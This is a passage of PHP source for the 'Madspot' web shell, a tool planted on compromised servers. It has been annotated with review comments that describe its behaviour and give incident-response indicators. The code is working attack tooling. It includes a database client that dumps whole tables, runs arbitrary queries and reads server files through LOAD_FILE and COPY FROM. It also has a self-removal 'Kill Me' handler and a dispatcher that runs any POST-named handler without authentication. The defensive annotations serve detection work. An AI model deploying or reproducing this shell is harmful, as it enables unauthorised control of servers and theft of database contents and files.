1722                                             return @pg_set_client_encoding($this->link, $str);
1723                                             break;
1724                             }
1725                             return false;
1726                     }
                         /**
                          * Read a file from the DATABASE SERVER's filesystem through the
                          * DB connection, i.e. an arbitrary-file-read that uses database
                          * privileges rather than the web server's:
                          * mysql: SELECT LOAD_FILE(...) -- needs the FILE privilege and
                          *        yields NULL for unreadable paths.
                          * pgsql: COPY ... FROM '<path>' into a scratch table "wso2"
                          *        (needs superuser / pg_read_server_files), then the rows
                          *        are joined with "\n" and the table is dropped. The three
                          *        statements go through one pg_query() call, whose result
                          *        is that of the final SELECT.
                          * Returns an array with key 'file' (false for unknown type).
                          * $str is operator input and is only addslashes()-escaped.
                          */
1727                     function loadFile($str) {
1728                             switch($this->type)     {
1729                                     case 'mysql':
1730                                             return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
1731                                     break;
1732                                     case 'pgsql':
1733                                             $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;");
1734                                             $r=array();
1735                                             while($i=$this->fetch())
1736                                                     $r[] = $i['file'];
1737                                             $this->query('drop table wso2');
1738                                             return array('file'=>implode("\n",$r));
1739                                     break;
1740                             }
1741                             return false;
1742                     }
                         /**
                          * Write a SQL dump of $table to the file handle $fp, or echo it
                          * when $fp is false. Always returns false.
                          * mysql: "SHOW CREATE TABLE" output, then a single multi-row
                          *        INSERT with per-value formatting (NULL / bare numeric /
                          *        quoted via mysql_real_escape_string). The column list is
                          *        rebuilt for every row but only emitted for the first.
                          * pgsql: one INSERT per row, values quoted with addslashes().
                          *
                          * NOTE(review): "$v == null" is a loose comparison, so empty
                          * strings are dumped as NULL; is_numeric() leaves numeric-looking
                          * strings such as "007" or "1e3" unquoted, which changes them on
                          * restore. For pgsql, addslashes() produces backslash-escaped
                          * quotes that PostgreSQL does not treat as escapes when
                          * standard_conforming_strings is on (the default since 9.1).
                          */
1743                     function dump($table, $fp = false) {
1744                             switch($this->type)     {
1745                                     case 'mysql':
1746                                             $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
1747                                             $create = mysql_fetch_array($res);
1748                                             $sql = $create[1].";\n";
1749                         if($fp) fwrite($fp, $sql); else echo($sql);
1750                                             $this->query('SELECT * FROM `'.$table.'`');
1751                         $head = true;
1752                                             while($item = $this->fetch()) {
1753                                                     $columns = array();
1754                                                     foreach($item as $k=>$v) {
1755                                 if($v == null)
1756                                     $item[$k] = "NULL";
1757                                 elseif(is_numeric($v))
1758                                     $item[$k] = $v;
1759                                 else
1760                                     $item[$k] = "'".@mysql_real_escape_string($v)."'";
1761                                                             $columns[] = "`".$k."`";
1762                                                     }
1763                             if($head) {
1764                                 $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
1765                                 $head = false;
1766                             } else
1767                                 $sql = "\n\t,(".implode(", ", $item).')';
1768                             if($fp) fwrite($fp, $sql); else echo($sql);
1769                                             }
1770                         if(!$head)
1771                             if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
1772                                     break;
1773                                     case 'pgsql':
1774                                             $this->query('SELECT * FROM '.$table);
1775                                             while($item = $this->fetch()) {
1776                                                     $columns = array();
1777                                                     foreach($item as $k=>$v) {
1778                                                             $item[$k] = "'".addslashes($v)."'";
1779                                                             $columns[] = $k;
1780                                                     }
1781                             $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
1782                             if($fp) fwrite($fp, $sql); else echo($sql);
1783                                             }
1784                                     break;
1785                             }
1786                             return false;
1787                     }
1788             };
1789             $db = new DbClass($_POST['type']);
1790             if(@$_POST['p2']=='download') {
1791                     $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
1792                     $db->selectdb($_POST['sql_base']);
1793             switch($_POST['charset']) {
1794                 case "Windows-1251": $db->setCharset('cp1251'); break;
1795                 case "UTF-8": $db->setCharset('utf8'); break;
1796                 case "KOI8-R": $db->setCharset('koi8r'); break;
1797                 case "KOI8-U": $db->setCharset('koi8u'); break;
1798                 case "cp866": $db->setCharset('cp866'); break;
1799             }
1800             if(empty($_POST['file'])) {
1801                 ob_start("ob_gzhandler", 4096);
1802                 header("Content-Disposition: attachment; filename=dump.sql");
1803                 header("Content-Type: text/plain");
1804                 foreach($_POST['tbl'] as $v)
1805                                     $db->dump($v);
1806                 exit;
1807             } elseif($fp = @fopen($_POST['file'], 'w')) {
1808                 foreach($_POST['tbl'] as $v)
1809                     $db->dump($v, $fp);
1810                 fclose($fp);
1811                 unset($_POST['p2']);
1812             } else
1813                 die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
1814             }
1815             madhead();
1816             echo "
1817     <div class=header>
1818     <form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
1819     <td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
1820     <input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
1821     <td><select name='type'><option value='mysql' ";
1822         if(@$_POST['type']=='mysql')echo 'selected';
1823     echo ">MySql</option><option value='pgsql' ";
1824     if(@$_POST['type']=='pgsql')echo 'selected';
1825     echo ">PostgreSql</option></select></td>
1826     <td><input type=text name=sql_host value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
1827     <td><input type=text name=sql_login value='". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."'></td>
1828     <td><input type=text name=sql_pass value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
1829             $tmp = "<input type=text name=sql_base value=''>";
1830             if(isset($_POST['sql_host'])){
1831                     if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
1832                             switch($_POST['charset']) {
1833                                     case "Windows-1251": $db->setCharset('cp1251'); break;
1834                                     case "UTF-8": $db->setCharset('utf8'); break;
1835                                     case "KOI8-R": $db->setCharset('koi8r'); break;
1836                                     case "KOI8-U": $db->setCharset('koi8u'); break;
1837                                     case "cp866": $db->setCharset('cp866'); break;
1838                             }
1839                             $db->listDbs();
1840                             echo "<select name=sql_base><option value=''></option>";
1841                             while($item = $db->fetch()) {
1842                                     list($key, $value) = each($item);
1843                                     echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
1844                             }
1845                             echo '</select>';
1846                     }
1847                     else echo $tmp;
1848             }else
1849                     echo $tmp;
1850             echo "</td>
1851                                     <td><input type=submit value='>>' onclick='fs(d.sf);'></td>
1852                    <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>
1853                             </tr>
1854                     </table>
1855                     <script>
1856                s_db='".@addslashes($_POST['sql_base'])."';
1857                function fs(f) {
1858                    if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
1859                        if(f.p1) f.p1.value='';
1860                        if(f.p2) f.p2.value='';
1861                        if(f.p3) f.p3.value='';
1862                    }
1863                }
1864                             function st(t,l) {
1865                                     d.sf.p1.value = 'select';
1866                                     d.sf.p2.value = t;
1867                    if(l && d.sf.p3) d.sf.p3.value = l;
1868                                     d.sf.submit();
1869                             }
1870                             function is() {
1871                                     for(i=0;i<d.sf.elements['tbl[]'].length;++i)
1872                                             d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
1873                             }
1874                     </script>";
1875             if(isset($db) && $db->link){
1876                     echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
1877                             if(!empty($_POST['sql_base'])){
1878                                     $db->selectdb($_POST['sql_base']);
1879                                     echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
1880                                     $tbls_res = $db->listTables();
1881                                     while($item = $db->fetch($tbls_res)) {
1882                                             list($key, $value) = each($item);
1883                         if(!empty($_POST['sql_count']))
1884                             $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
1885                                             $value = htmlspecialchars($value);
1886                                             echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small>({$n['n']})</small>") . "</nobr><br>";
1887                                     }
1888                                     echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
1889                                     if(@$_POST['p1'] == 'select') {
1890                                             $_POST['p1'] = 'query';
1891                         $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
1892                                             $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
1893                                             $num = $db->fetch();
1894                                             $pages = ceil($num['n'] / 30);
1895                         echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
1896                         echo " of $pages";
1897                         if($_POST['p3'] > 1)
1898                             echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>< Prev</a>";
1899                         if($_POST['p3'] < $pages)
1900                             echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next ></a>";
1901                         $_POST['p3']--;
1902                                             if($_POST['type']=='pgsql')
1903                                                     $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
1904                                             else
1905                                                     $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
1906                                             echo "<br><br>";
1907                                     }
1908                                     if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
1909                                             $db->query(@$_POST['p2']);
1910                                             if($db->res !== false) {
1911                                                     $title = false;
1912                                                     echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
1913                                                     $line = 1;
1914                                                     while($item = $db->fetch())     {
1915                                                             if(!$title)     {
1916                                                                     echo '<tr>';
1917                                                                     foreach($item as $key => $value)
1918                                                                             echo '<th>'.$key.'</th>';
1919                                                                     reset($item);
1920                                                                     $title=true;
1921                                                                     echo '</tr><tr>';
1922                                                                     $line = 2;
1923                                                             }
1924                                                             echo '<tr class="l'.$line.'">';
1925                                                             $line = $line==1?2:1;
1926                                                             foreach($item as $key => $value) {
1927                                                                     if($value == null)
1928                                                                             echo '<td><i>null</i></td>';
1929                                                                     else
1930                                                                             echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
1931                                                             }
1932                                                             echo '</tr>';
1933                                                     }
1934                                                     echo '</table>';
1935                                             } else {
1936                                                     echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
1937                                             }
1938                                     }
1939                                     echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
1940                     if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
1941                         echo htmlspecialchars($_POST['p2']);
1942                     echo "</textarea><br/><input type=submit value='Execute'>";
1943                                     echo "</td></tr>";
1944                             }
1945                             echo "</table></form><br/>";
1946                 if($_POST['type']=='mysql') {
1947                     $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
1948                     if($db->fetch())
1949                         echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
1950                 }
1951                             if(@$_POST['p1'] == 'loadfile') {
1952                                     $file = $db->loadFile($_POST['p2']);
1953                                     echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
1954                             }
1955             } else {
1956             echo htmlspecialchars($db->error());
1957         }
1958             echo '</div>';
1959         madfooter();
1960 
1961      }
1962 
1963      function madselfrm()
1964      {
         // "Killcode" handler: removes the shell script from disk.
         // POST p1 == 'yes'  -> unlink() the running file (see below) and stop.
         // any other p1      -> render a confirmation page whose "Yes" link resubmits p1=yes.
         //
         // The file name passed to unlink() is __FILE__ with a trailing "(NN) ..." part
         // stripped by preg_replace; presumably this handles the
         // "path.php(NN) : eval()'d code" form __FILE__ takes when the shell is loaded
         // through eval() -- not verifiable from this listing.
         //
         // NOTE(review): no authentication or CSRF check is visible in this function
         // (nor in the dispatcher that calls it); any client able to POST p1=yes to the
         // script deletes it. For incident response, the literal responses
         // 'Shell has been removed' / 'unlink error!' and an unlink() of the serving
         // script in the web server's own process are high-signal indicators.
1965 
1966         if($_POST['p1'] == 'yes')
                    // '@' suppresses the unlink() warning, so a failure reason (permissions,
                    // immutable file, path mismatch) is never reported beyond 'unlink error!'.
1967                     if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
1968                             die('Shell has been removed');
1969                     else
1970                             echo 'unlink error!';
         // Only madhead() is guarded by this if (no braces): every statement below it
         // runs whenever control gets here, i.e. for p1 != 'yes' AND after a failed unlink.
1971         if($_POST['p1'] != 'yes')
1972             madhead();
1973             echo "<div class=header><pre class=ml1 style='margin-top:5px'>";
1974 
1975 
         // ASCII-art "skull" banner; a static string with no runtime input.
1976         echo "
1977 
1978                    /^\
1979           _.-`:   /   \   :'-._
1980         ,`    :  |     |  :    '.
1981       ,`       \,|     |,/       '.
1982      /           `-...-`           \
1983     :              .'.              :
1984     |             . ' .             |
1985     |             ' . '             |
1986     :              '.'              :
1987      \           ,-'''-,           /
1988       `.       /'|     |'\       ,'
1989         `._   ;  |     |  ;   _,'
1990            `-.:  |     |  :,-'
1991                  |     |
1992                  |     |
1993                  |     |
1994                  |     |
1995                  |     |
1996     ";
1997 
1998 
1999 
         // The confirmation link calls the client-side helper g() (defined outside this
         // view); from its arguments it presumably resubmits the form with p1='yes'.
2000         echo '<br>Kill Me?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
             // PHP function names are case-insensitive, so madFooter() is the same
             // function as the madfooter() called by the SQL handler above.
2001             madFooter();
2002 
2003      }
2004 
2005 
// Request dispatcher. The POST parameter 'a' names the handler; it is invoked as the
// PHP function 'mad' . $a via call_user_func (e.g. a=selfrm -> madselfrm()).
// An empty 'a' falls back to $default_action, if it is set earlier in the file and a
// matching 'mad' handler exists, and otherwise to 'FilesMan'.
2006     if( empty($_POST['a']) )
2007             if(isset($default_action) && function_exists('mad' . $default_action))
2008                     $_POST['a'] = $default_action;
2009             else
2010                     $_POST['a'] = 'FilesMan';
// Reachable targets are limited to existing functions whose name starts with 'mad',
// so this is not arbitrary function execution -- but nothing here authenticates the
// caller: whoever can POST to this file chooses the handler.
// NOTE(review, detection): every interaction with this shell is an HTTP POST to the
// dropped file carrying an 'a' parameter (plus per-handler p1.. parameters), which is
// the main request-level signature to hunt for in web server logs.
2011     if( !empty($_POST['a']) && function_exists('mad' . $_POST['a']) )
2012             call_user_func('mad' . $_POST['a']);
             // exit is NOT inside the if above (no braces); the indentation is misleading.
             // An unknown action therefore ends in an empty response rather than an error.
2013             exit;
2014     ?>

A screenshot of Madspot Shell in action.

madspot shell screenshot
Screenshot of the Madspot shell